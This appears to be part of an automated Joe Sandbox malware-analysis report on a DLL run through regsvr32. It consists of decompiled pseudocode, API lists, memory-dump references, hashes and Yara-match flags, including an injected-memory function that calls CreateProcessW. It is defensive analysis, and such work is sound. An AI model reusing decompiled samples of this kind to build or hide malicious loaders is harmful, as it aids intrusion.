                                                                                                                                                                                                              • Part of subcall function 000000018000878C: HeapFree.KERNEL32(?,?,00000000,000000018000E6BE,?,?,?,000000018000E6FB,?,?,00000000,000000018000BED5,?,?,?,000000018000BE07), ref: 00000001800087A2
                                                                                                                                                                                                              • Part of subcall function 000000018000878C: GetLastError.KERNEL32(?,?,00000000,000000018000E6BE,?,?,?,000000018000E6FB,?,?,00000000,000000018000BED5,?,?,?,000000018000BE07), ref: 00000001800087AC
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorFreeHeapLast_invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID: C:\Windows\system32\regsvr32.exe
                                                                                                                                                                                                            • API String ID: 2724796048-464481000
                                                                                                                                                                                                            • Opcode ID: 6ab70c768575c3897d89b9d56517bfe78e9b9e214d555ff294bd8044b7c9c220
                                                                                                                                                                                                            • Instruction ID: 22eee0821ddd0031139ae0324638ff7f0a91ab2d69636e8f5a4f0751baae73e2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6ab70c768575c3897d89b9d56517bfe78e9b9e214d555ff294bd8044b7c9c220
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C4418B36601B1896FB97DF65A8403EC3795FB4CBC4F588025FE4A43BAADE34C6898340
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028F3988 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 105processCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 415 28f3988-28f3a3e call 28f9f38 418 28f3acc-28f3b12 CreateProcessW 415->418 419 28f3a44-28f3ac6 call 28ea940 415->419 419->418
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateProcess
                                                                                                                                                                                                            • String ID: li
                                                                                                                                                                                                            • API String ID: 963392458-3170889640
                                                                                                                                                                                                            • Opcode ID: df447d1959c748b5d8cf34ebfef7c4b31b83bdbcb52bf56f40cb8f0245456118
                                                                                                                                                                                                            • Instruction ID: 17b5b39dec55c62519c6112a39821f453f047b443f875d20634c34c720dba2a1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: df447d1959c748b5d8cf34ebfef7c4b31b83bdbcb52bf56f40cb8f0245456118
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9F41E67091CB848FDBA4DF18D0C979AB7E0FB98315F20495DE58DC7295CB789884CB86
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 0000000180002D5C Relevance: 2.6, APIs: 2, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                                                                                            			E00000001180002D5C(void* __rax, long long __rbx, signed int __rdx, long long __rsi, long long _a8, long long _a16) {
				void* _t12;
				intOrPtr _t14;
				intOrPtr _t16;
				intOrPtr _t17;
				void* _t48;

				_a8 = __rbx;
				_a16 = __rsi;
				if ( *0x80021030 != 0xffffffff) goto 0x80002d7b;
				goto 0x80002e0b;
				GetLastError();
				E0000000118000479C();
				if (__rax == (__rdx | 0xffffffff)) goto 0x80002e00;
				if (__rax == 0) goto 0x80002da3;
				goto 0x80002e00;
				_t14 =  *0x80021030; // 0xffffffff
				if (E000000011800047E4(_t14, __rax, __rax, __rbx, __rdx | 0xffffffff) == 0) goto 0x80002e00;
				0x80006ee8();
				_t16 =  *0x80021030; // 0xffffffff
				if (__rax == 0) goto 0x80002df1;
				if (E000000011800047E4(_t16, __rax, __rax, __rax, __rax) == 0) goto 0x80002deb;
				 *((intOrPtr*)(__rax + 0x78)) = 0xfffffffe;
				goto 0x80002df8;
				_t17 =  *0x80021030; // 0xffffffff
				E000000011800047E4(_t17, 0, __rax, __rax, __rax);
				_t12 = E00000001180006E14(__rax, __rax, __rax, _t48);
				SetLastError(??);
				return _t12;
			}








                                                                                                                                                                                                            0x180002d5c
                                                                                                                                                                                                            0x180002d61
                                                                                                                                                                                                            0x180002d72
                                                                                                                                                                                                            0x180002d76
                                                                                                                                                                                                            0x180002d7b
                                                                                                                                                                                                            0x180002d89
                                                                                                                                                                                                            0x180002d97
                                                                                                                                                                                                            0x180002d9c
                                                                                                                                                                                                            0x180002da1
                                                                                                                                                                                                            0x180002da3
                                                                                                                                                                                                            0x180002db0
                                                                                                                                                                                                            0x180002dba
                                                                                                                                                                                                            0x180002dbf
                                                                                                                                                                                                            0x180002dcb
                                                                                                                                                                                                            0x180002dd7
                                                                                                                                                                                                            0x180002ddc
                                                                                                                                                                                                            0x180002de9
                                                                                                                                                                                                            0x180002deb
                                                                                                                                                                                                            0x180002df3
                                                                                                                                                                                                            0x180002dfb
                                                                                                                                                                                                            0x180002e02
                                                                                                                                                                                                            0x180002e1a

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,0000000180002A39,?,?,?,?,000000018000118D), ref: 0000000180002D7B
                                                                                                                                                                                                            • SetLastError.KERNEL32(?,?,?,0000000180002A39,?,?,?,?,000000018000118D), ref: 0000000180002E02
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorLast
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1452528299-0
                                                                                                                                                                                                            • Opcode ID: cdbe379cb5629799528523a4ad6f56955db2d9e1df670e64dd206f7f8531e669
                                                                                                                                                                                                            • Instruction ID: abfe4fc6b17608ace84b68e371925030d4792a6751c1db58b4a89185c935b6c5
                                                                                                                                                                                                            • Opcode Fuzzy Hash: cdbe379cb5629799528523a4ad6f56955db2d9e1df670e64dd206f7f8531e669
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B116335A1568886FAD7D726D8807D93291AB4D7E0F08C665B92A073E5DF78CA89C700
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 000000018000D26C Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 446 18000d26c-18000d289 447 18000d2b4-18000d2c1 call 180008160 446->447 448 18000d28b-18000d29c call 1800086f4 call 1800085b8 446->448 454 18000d2c7-18000d2ce 447->454 459 18000d29e-18000d2b3 448->459 456 18000d306-18000d312 call 1800081b4 454->456 457 18000d2d0-18000d2db 454->457 456->459 460 18000d2dd 457->460 461 18000d2df call 18000d174 457->461 462 18000d301-18000d304 460->462 465 18000d2e4-18000d2eb 461->465 462->454 466 18000d2f2-18000d2fb 465->466 467 18000d2ed-18000d2f0 465->467 466->462 467->456
                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                            			E0000000118000D26C(void* __ecx, intOrPtr* __rax, long long __rbx, long long __rdi, long long __rsi, long long _a8, long long _a16, long long _a24) {

				_a8 = __rbx;
				_a16 = __rsi;
				_a24 = __rdi;
				if (__ecx - 0x2000 < 0) goto 0x8000d2b4;
				E000000011800086F4(__ecx - 0x2000, __rax);
				 *__rax = 9;
				E000000011800085B8();
				return 9;
			}



                                                                                                                                                                                                            0x18000d26c
                                                                                                                                                                                                            0x18000d271
                                                                                                                                                                                                            0x18000d276
                                                                                                                                                                                                            0x18000d289
                                                                                                                                                                                                            0x18000d28b
                                                                                                                                                                                                            0x18000d295
                                                                                                                                                                                                            0x18000d297
                                                                                                                                                                                                            0x18000d2b3

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                            • Opcode ID: b2bec9f1c83fd2e5dff941a4990122d97467662781677e8ba2cfdbb0e4efa737
                                                                                                                                                                                                            • Instruction ID: 290c2a04846c9b039a5155463e3184fcb060a742c36b4207bfb39a2b49eb85f2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b2bec9f1c83fd2e5dff941a4990122d97467662781677e8ba2cfdbb0e4efa737
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3911AC3210468C82F383DF14E8507D9B7A4FB5C7C0F058426FA9547BAADF38CA199B50
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 0000000180008714 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 468 180008714-180008723 469 180008733-180008743 468->469 470 180008725-180008731 468->470 472 18000875a-180008772 RtlAllocateHeap 469->472 470->469 471 180008776-180008781 call 1800086f4 470->471 476 180008783-180008788 471->476 473 180008774 472->473 474 180008745-18000874c call 18000c08c 472->474 473->476 474->471 480 18000874e-180008758 call 18000abf8 474->480 480->471 480->472
                                                                                                                                                                                                            C-Code - Quality: 44%
                                                                                                                                                                                                            			E00000001180008714(void* __eax, signed int __rcx, signed int __rdx) {
				void* __rbx;
				intOrPtr* _t22;
				signed int _t29;

				_t29 = __rdx;
				if (__rcx == 0) goto 0x80008733;
				_t1 = _t29 - 0x20; // -32
				_t22 = _t1;
				if (_t22 - __rdx < 0) goto 0x80008776;
				_t25 =  ==  ? _t22 : __rcx * __rdx;
				goto 0x8000875a;
				if (E0000000118000C08C() == 0) goto 0x80008776;
				if (E0000000118000ABF8(_t22,  ==  ? _t22 : __rcx * __rdx,  ==  ? _t22 : __rcx * __rdx) == 0) goto 0x80008776;
				RtlAllocateHeap(??, ??, ??); // executed
				if (_t22 == 0) goto 0x80008745;
				goto 0x80008783;
				E000000011800086F4(_t22, _t22);
				 *_t22 = 0xc;
				return 0;
			}






                                                                                                                                                                                                            0x180008714
                                                                                                                                                                                                            0x180008723
                                                                                                                                                                                                            0x180008727
                                                                                                                                                                                                            0x180008727
                                                                                                                                                                                                            0x180008731
                                                                                                                                                                                                            0x18000873f
                                                                                                                                                                                                            0x180008743
                                                                                                                                                                                                            0x18000874c
                                                                                                                                                                                                            0x180008758
                                                                                                                                                                                                            0x180008769
                                                                                                                                                                                                            0x180008772
                                                                                                                                                                                                            0x180008774
                                                                                                                                                                                                            0x180008776
                                                                                                                                                                                                            0x18000877b
                                                                                                                                                                                                            0x180008788

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(?,?,00000000,0000000180007F92,?,?,0000C23E8D4AF72C,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000), ref: 0000000180008769
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                                                            • Opcode ID: 7cf3c04cd0eb283655c87112c6735f3b789bd4b36bb41325690c7ae62c9b4c65
                                                                                                                                                                                                            • Instruction ID: 66bea78d34406d615fa8c08e42eaa36a882f8058afe23dfc71e7ff7acb685faa
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7cf3c04cd0eb283655c87112c6735f3b789bd4b36bb41325690c7ae62c9b4c65
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A1F06D74309A0881FED7D7A599003D522D16F5CBC0F2CD4302D4E863DAEE1CC788A320
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 0000000180001268 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            C-Code - Quality: 71%
                                                                                                                                                                                                            			E00000001180001268(void* __ecx) {
				void* __rbx;
				void* _t12;
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t21;

				_t2 =  ==  ? 1 :  *0x80021ae0 & 0x000000ff;
				 *0x80021ae0 =  ==  ? 1 :  *0x80021ae0 & 0x000000ff;
				E00000001180001A80(1, _t12, __ecx, _t17, _t18, _t19, _t20, _t21);
				if (E00000001180002A08() != 0) goto 0x80001297;
				goto 0x800012ab; // executed
				E00000001180006CDC(_t17); // executed
				if (0 != 0) goto 0x800012a9;
				E00000001180002A58(0);
				goto 0x80001293;
				return 1;
			}










                                                                                                                                                                                                            0x18000127c
                                                                                                                                                                                                            0x18000127f
                                                                                                                                                                                                            0x180001285
                                                                                                                                                                                                            0x180001291
                                                                                                                                                                                                            0x180001295
                                                                                                                                                                                                            0x180001297
                                                                                                                                                                                                            0x18000129e
                                                                                                                                                                                                            0x1800012a2
                                                                                                                                                                                                            0x1800012a7
                                                                                                                                                                                                            0x1800012b0

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • __scrt_dllmain_crt_thread_attach.LIBCMT ref: 000000018000128A
                                                                                                                                                                                                              • Part of subcall function 0000000180002A08: __vcrt_initialize_locks.LIBVCRUNTIME ref: 0000000180002A0C
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: __scrt_dllmain_crt_thread_attach__vcrt_initialize_locks
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 108617051-0
                                                                                                                                                                                                            • Opcode ID: b3a5aff99e9bbd50fc4b4caf8482eddb7f62de2f1dfabb963a32cf9525c58297
                                                                                                                                                                                                            • Instruction ID: 3927130d99c38a55cbe47f9f4b507d4a3e007974ffcd633e9ac0bb37393e6b58
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b3a5aff99e9bbd50fc4b4caf8482eddb7f62de2f1dfabb963a32cf9525c58297
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 66E01A30B0528C8EFEE7E6B525423F937501B1E3C2F40D068B892825838D0947AD5722
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 0000000180010A8E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: LoadString$ExitProcess
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 80118013-0
                                                                                                                                                                                                            • Opcode ID: 4511720a80b85894ed9872a941f45ad7e5906891a0c13688ba3e14c3fa3ec101
                                                                                                                                                                                                            • Instruction ID: b62d2fb12763fda2a64a5ee64e5548852d899a580494aacca0011f8ebade0f7c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4511720a80b85894ed9872a941f45ad7e5906891a0c13688ba3e14c3fa3ec101
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E1D0C936625A4892E7A29B61F80578A2390B78C7D4F809111A98C42A24CF2CC2098B00
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                            Function 0000000180014555 Relevance: 216.5, APIs: 144, Instructions: 493COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorLastShowWindow
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3252650109-0
                                                                                                                                                                                                            • Opcode ID: 9a665b6fd1606399514c88e51871797ade4cb1dce934726ac272da09cbabfbb3
                                                                                                                                                                                                            • Instruction ID: 20d447c0f35bcb8e3c3c297cfd2fae4a36a0868fd259666119818285c186e9df
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9a665b6fd1606399514c88e51871797ade4cb1dce934726ac272da09cbabfbb3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B522B976B00E0986FBDB9F72AC1439B22A2AB8CBD5F46C439E40689174DE7DC75D8305
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 0000000180001C48 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3140674995-0
                                                                                                                                                                                                            • Opcode ID: 1ffe1e744cccfe4686aba7d6a8aca853fc79a5f69e58afced9d2bc9442cc5b87
                                                                                                                                                                                                            • Instruction ID: 43a781f402e08a9585d1bfd569913690a5560a40171371ec2054230cf506bc92
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1ffe1e744cccfe4686aba7d6a8aca853fc79a5f69e58afced9d2bc9442cc5b87
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1931FB72605B848AEBA1DF60E8507EE7365F788785F44842AEB4E47A99DF38C74CC710
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 00000001800082EC Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            C-Code - Quality: 65%
                                                                                                                                                                                                            			E000000011800082EC(void* __ecx, intOrPtr __edx, long long __rbx, long long __rsi) {
				void* _t36;
				int _t38;
				signed long long _t60;
				long long _t63;
				_Unknown_base(*)()* _t82;
				void* _t86;
				void* _t87;
				void* _t89;
				signed long long _t90;
				struct _EXCEPTION_POINTERS* _t95;

				 *((long long*)(_t89 + 0x10)) = __rbx;
				 *((long long*)(_t89 + 0x18)) = __rsi;
				_t87 = _t89 - 0x4f0;
				_t90 = _t89 - 0x5f0;
				_t60 =  *0x80021010; // 0xc23e8d4af72c
				 *(_t87 + 0x4e0) = _t60 ^ _t90;
				if (__ecx == 0xffffffff) goto 0x8000832b;
				E00000001180001C40(_t36);
				r8d = 0x98;
				E00000001180002680();
				r8d = 0x4d0;
				E00000001180002680();
				 *((long long*)(_t90 + 0x48)) = _t90 + 0x70;
				_t63 = _t87 + 0x10;
				 *((long long*)(_t90 + 0x50)) = _t63;
				__imp__RtlCaptureContext();
				r8d = 0;
				__imp__RtlLookupFunctionEntry();
				if (_t63 == 0) goto 0x800083be;
				 *(_t90 + 0x38) =  *(_t90 + 0x38) & 0x00000000;
				 *((long long*)(_t90 + 0x30)) = _t90 + 0x58;
				 *((long long*)(_t90 + 0x28)) = _t90 + 0x60;
				 *((long long*)(_t90 + 0x20)) = _t87 + 0x10;
				__imp__RtlVirtualUnwind();
				 *((long long*)(_t87 + 0x108)) =  *((intOrPtr*)(_t87 + 0x508));
				 *((intOrPtr*)(_t90 + 0x70)) = __edx;
				 *((long long*)(_t87 + 0xa8)) = _t87 + 0x510;
				 *((long long*)(_t87 - 0x80)) =  *((intOrPtr*)(_t87 + 0x508));
				 *((intOrPtr*)(_t90 + 0x74)) = r8d;
				_t38 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(_t82, _t86);
				if (UnhandledExceptionFilter(_t95) != 0) goto 0x80008420;
				if (_t38 != 0) goto 0x80008420;
				if (__ecx == 0xffffffff) goto 0x80008420;
				return E000000011800010B0(E00000001180001C40(_t40), __ecx,  *(_t87 + 0x4e0) ^ _t90);
			}













                                                                                                                                                                                                            0x1800082ec
                                                                                                                                                                                                            0x1800082f1
                                                                                                                                                                                                            0x1800082fa
                                                                                                                                                                                                            0x180008302
                                                                                                                                                                                                            0x180008309
                                                                                                                                                                                                            0x180008313
                                                                                                                                                                                                            0x180008324
                                                                                                                                                                                                            0x180008326
                                                                                                                                                                                                            0x180008332
                                                                                                                                                                                                            0x180008338
                                                                                                                                                                                                            0x180008343
                                                                                                                                                                                                            0x180008349
                                                                                                                                                                                                            0x180008353
                                                                                                                                                                                                            0x18000835c
                                                                                                                                                                                                            0x180008360
                                                                                                                                                                                                            0x180008365
                                                                                                                                                                                                            0x18000837a
                                                                                                                                                                                                            0x18000837d
                                                                                                                                                                                                            0x180008386
                                                                                                                                                                                                            0x180008388
                                                                                                                                                                                                            0x18000839b
                                                                                                                                                                                                            0x1800083a8
                                                                                                                                                                                                            0x1800083b1
                                                                                                                                                                                                            0x1800083b8
                                                                                                                                                                                                            0x1800083c5
                                                                                                                                                                                                            0x1800083d7
                                                                                                                                                                                                            0x1800083db
                                                                                                                                                                                                            0x1800083e9
                                                                                                                                                                                                            0x1800083ed
                                                                                                                                                                                                            0x1800083f1
                                                                                                                                                                                                            0x1800083fb
                                                                                                                                                                                                            0x18000840e
                                                                                                                                                                                                            0x180008412
                                                                                                                                                                                                            0x180008417
                                                                                                                                                                                                            0x180008446

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1239891234-0
                                                                                                                                                                                                            • Opcode ID: d0fc5085bf44c4937be082645d9f0fd030d92464e7166f1adeb9fe9a04ad5cc9
                                                                                                                                                                                                            • Instruction ID: d6e40695d6015e5c843dff92317e70983bbd332ebd8c23179410134a75d63e3d
